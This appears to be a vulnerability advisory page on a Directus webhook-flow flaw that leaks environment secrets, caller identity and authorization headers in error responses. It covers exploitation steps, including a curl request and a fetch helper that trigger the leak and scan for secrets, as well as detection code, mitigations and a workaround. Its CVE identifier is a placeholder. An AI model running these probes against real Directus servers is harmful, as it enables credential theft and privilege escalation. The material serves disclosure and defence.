How the CVE Works
The vulnerability occurs when a Directus Flow uses a "Webhook" trigger with its Response Body set to "Data of Last Operation" and a Condition operation in that flow fails. Instead of returning a sanitized error, the webhook response serialises the flow's internal data chain, which can include:
– Environment variables exposed to Flows ($env)
– Authentication headers from the triggering request
– The identity and permissions of the caller ($accountability)
– Outputs of earlier operations (for example current_payments, and $last)
The failure path treats the whole data chain as if it were debug output and writes it into the API response. An attacker who can reach the webhook URL can exploit this by sending a payload that deliberately fails the condition, reading secrets and identity data out of the error response, and using them to escalate privileges.
DailyCVE Form:
Platform: Directus
Version: <= 10.11.3
Vulnerability: Information Disclosure
Severity: Critical
Date: 2024-06-15
What Undercode Say:
Exploitation:
1. Trigger the vulnerable webhook flow with a request body that fails the flow's Condition operation (the exact payload depends on the condition rule; `<flow-id>` is the flow's ID in the `/flows/trigger/` URL). Use a valid token, or none if the flow accepts public requests: the goal is to reach the Condition operation, not to fail authentication.
curl -X POST "https://target.com/flows/trigger/<flow-id>" -H "Content-Type: application/json" -d '{"status": "unexpected"}'
2. Inspect the JSON error response for `$env`, `$accountability`, `$last` or header keys such as `authorization`.
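The scan in step 2, as an added example that is not part of the original post or of Directus itself. It walks a parsed webhook response and reports the paths at which data-chain keys (`$env`, `$accountability`, `$last`, and `$trigger`, which Directus also places in the chain) or credential-bearing header names appear, and it includes a small `fetch`-based trigger helper for Node 18+. The sample response body is constructed to illustrate the shape of the leak; its values are placeholders, not data captured from a real system.

```javascript
// Added example, not Directus code: find internal data-chain keys and
// credential headers in a webhook error response.
const SENSITIVE_KEYS = new Set(["$env", "$accountability", "$last", "$trigger"]);
const CREDENTIAL_HEADERS = new Set(["authorization", "cookie", "x-api-key"]);

// Recursively walk the response and record where sensitive keys surface.
function findLeakedKeys(node, path = "$", hits = []) {
  if (Array.isArray(node)) {
    node.forEach((item, i) => findLeakedKeys(item, `${path}[${i}]`, hits));
    return hits;
  }
  if (node === null || typeof node !== "object") return hits;
  for (const [key, value] of Object.entries(node)) {
    const childPath = `${path}.${key}`;
    if (SENSITIVE_KEYS.has(key)) hits.push({ path: childPath, kind: "data-chain" });
    if (CREDENTIAL_HEADERS.has(key.toLowerCase())) hits.push({ path: childPath, kind: "credential" });
    findLeakedKeys(value, childPath, hits);
  }
  return hits;
}

// Constructed sample of the kind of body the vulnerable failure path returns
// (hypothetical shape; placeholder values only).
const SAMPLE_LEAK = {
  errors: [{ message: "Condition failed", extensions: { code: "FAILED_VALIDATION" } }],
  $trigger: {
    headers: { authorization: "Bearer placeholder.token", "content-type": "application/json" },
    body: { status: "unexpected" },
  },
  $accountability: { user: "placeholder-user-id", role: "placeholder-role-id", admin: true, ip: "203.0.113.7" },
  $env: { DB_PASSWORD: "placeholder", SECRET: "placeholder" },
  $last: { status: "unexpected" },
};

// Send the condition-failing payload and scan whatever comes back.
// Not executed here; requires network access and a real flow URL.
async function triggerAndScan(url, payload, token) {
  const headers = { "Content-Type": "application/json" };
  if (token) headers.Authorization = `Bearer ${token}`;
  const res = await fetch(url, { method: "POST", headers, body: JSON.stringify(payload) });
  const body = await res.json();
  return { status: res.status, hits: findLeakedKeys(body) };
}

console.log(findLeakedKeys(SAMPLE_LEAK));
```

A response that is safe yields an empty list; any `data-chain` hit on an error response is the signature of this bug, and a `credential` hit means the caller's own token was echoed back to whoever can read the response.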
Mitigation:
1. Patch to Directus >= 10.11.4 (check the advisory linked below for the exact fixed release).
2. Limit what `$env` can expose. `FLOWS_ENV_ALLOW_LIST` is not a debug switch: it is the allow-list of environment variables that Flows may read through `$env`. Leave it unset (the default exposes none) or keep it to the minimum a flow needs:
FLOWS_ENV_ALLOW_LIST=""
3. If you maintain a patched or forked build, make sure the webhook failure path returns a generic message instead of the data chain, and hands every other error on to the next handler (`ValidationError` here stands for the application's own validation error class):
app.use((err, req, res, next) => {
  if (err instanceof ValidationError) {
    return res.status(400).json({ error: "Bad request" });
  }
  next(err);
});
This middleware does not change a stock installation; the upgrade is the real fix.
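To make the failure path concrete, the following is an added example, a simplified model written for this page and not Directus's actual source. It builds a webhook response from a data chain in the documented shape (`$trigger`, `$accountability`, `$env`, `$last`, plus one key per operation) and contrasts the behaviour the advisory describes (dumping the chain on a failed condition) with a hardened version that returns a fixed message on failure and strips reserved keys from `$last` on success. The data chain is constructed; the operation name `check_amount` and all values are placeholders.

```javascript
// Added example, not Directus source: vulnerable vs hardened response
// building for a webhook flow whose Response Body is "Data of Last Operation".
const RESERVED_KEYS = ["$trigger", "$accountability", "$env", "$last"];

// Constructed data chain after a Condition operation (hypothetical key
// "check_amount") rejected the request; values are placeholders.
function sampleDataChain() {
  return {
    $trigger: { headers: { authorization: "Bearer placeholder" }, body: { amount: -5 } },
    $accountability: { user: "placeholder-user", role: "placeholder-role", admin: true },
    $env: { DB_PASSWORD: "placeholder" },
    check_amount: null, // the condition failed, so the operation produced nothing
    $last: null,
  };
}

// Vulnerable behaviour the page describes: the whole chain goes into the
// error response.
function buildResponseVulnerable(chain, conditionPassed) {
  if (conditionPassed) return { status: 200, body: chain.$last };
  return { status: 400, body: { error: "Condition failed", data: chain } };
}

// Hardened: a fixed message on failure, and on success only $last with any
// reserved key removed, in case an operation copied part of the chain into it.
function buildResponseHardened(chain, conditionPassed) {
  if (!conditionPassed) return { status: 400, body: { error: "Bad request" } };
  return { status: 200, body: stripReserved(chain.$last) };
}

// Deep-copy a value, dropping reserved data-chain keys at every level.
function stripReserved(value) {
  if (Array.isArray(value)) return value.map(stripReserved);
  if (value === null || typeof value !== "object") return value;
  const out = {};
  for (const [key, inner] of Object.entries(value)) {
    if (RESERVED_KEYS.includes(key)) continue;
    out[key] = stripReserved(inner);
  }
  return out;
}

const chain = sampleDataChain();
console.log("vulnerable:", JSON.stringify(buildResponseVulnerable(chain, false)));
console.log("hardened:  ", JSON.stringify(buildResponseHardened(chain, false)));
```

The second safeguard (stripping reserved keys from a successful `$last`) goes slightly beyond the advisory: it covers flows where an earlier operation copies `$env` or `$accountability` into its own output, which the fixed error path alone would not catch.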
Detection:
The leak is in HTTP response bodies, and Directus writes its request log to stdout rather than recording response bodies, so grepping server logs for `$env` only works where bodies are captured (for example by a reverse proxy or WAF). Where they are:
grep -r '"\$env"' /var/log/directus/
Otherwise look for bursts of POST requests to /flows/trigger/ that end in 4xx/5xx responses from a single client, especially with error bodies far larger than a generic "Bad request" message; that is what repeated condition-failure probing looks like.
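The proxy-side detection described above, as an added example that is neither Directus code nor part of the original post. It parses nginx "combined" format access lines, counts per client the POST requests to `/flows/trigger/` that returned an error status, and notes how many of those error responses exceeded a byte threshold (a leaked data chain is much larger than a generic error). The log lines are constructed for the example and use documentation IP addresses; the flow ID `3f1c` and the thresholds are placeholders.

```javascript
// Added example, not Directus tooling: spot webhook-trigger probing in a
// reverse-proxy access log.
// Constructed nginx "combined" log lines (documentation IPs, placeholder flow ID).
const SAMPLE_LOG = `
203.0.113.7 - - [15/Jun/2024:10:00:01 +0000] "POST /flows/trigger/3f1c HTTP/1.1" 400 2310 "-" "curl/8.6.0"
203.0.113.7 - - [15/Jun/2024:10:00:02 +0000] "POST /flows/trigger/3f1c HTTP/1.1" 400 2310 "-" "curl/8.6.0"
203.0.113.7 - - [15/Jun/2024:10:00:03 +0000] "POST /flows/trigger/3f1c HTTP/1.1" 400 2298 "-" "curl/8.6.0"
198.51.100.4 - - [15/Jun/2024:10:00:05 +0000] "POST /flows/trigger/3f1c HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.4 - - [15/Jun/2024:10:01:00 +0000] "GET /items/articles HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jun/2024:10:00:04 +0000] "POST /flows/trigger/3f1c HTTP/1.1" 400 2310 "-" "curl/8.6.0"
`.trim();

// ip, ident, user, [time], "METHOD PATH PROTO", status, bytes
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return {
    ip: m[1],
    time: m[2],
    method: m[3],
    path: m[4],
    status: Number(m[5]),
    bytes: m[6] === "-" ? 0 : Number(m[6]),
  };
}

// Return clients with at least `threshold` error responses from the webhook
// trigger endpoint; `oversized` counts error bodies of `minBytes` or more.
function findTriggerProbing(logText, { threshold = 3, minBytes = 1024 } = {}) {
  const perIp = new Map();
  for (const raw of logText.split("\n")) {
    const rec = parseLine(raw);
    if (!rec || rec.method !== "POST" || !rec.path.startsWith("/flows/trigger/")) continue;
    if (rec.status < 400) continue; // successful runs are normal webhook traffic
    const entry = perIp.get(rec.ip) || { errors: 0, oversized: 0 };
    entry.errors += 1;
    if (rec.bytes >= minBytes) entry.oversized += 1;
    perIp.set(rec.ip, entry);
  }
  return [...perIp]
    .filter(([, e]) => e.errors >= threshold)
    .map(([ip, e]) => ({ ip, ...e }));
}

console.log(findTriggerProbing(SAMPLE_LOG));
```

Tune `threshold` to the flow's normal failure rate; the `oversized` count is the stronger signal, since a patched instance answers a failed condition with a body of a few dozen bytes.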
Impact Analysis:
- Leaked `$env` values (database credentials, storage and API keys) → compromise of the backing cloud services.
- Leaked `$accountability` (user, role, admin flag) and echoed authorization headers → impersonation and privilege escalation.
Workaround:
Until you can upgrade, set the affected Flows to inactive. The broad form below disables every webhook-triggered flow; narrow it to flows whose Response Body is "Data of Last Operation" by checking the `options` column, and re-enable them after patching:
UPDATE directus_flows SET status = 'inactive' WHERE trigger = 'webhook';
References:
- Directus advisory: https://github.com/advisories/GHSA-fm3h-p9wm-h74h
- CVE-2024-XXXX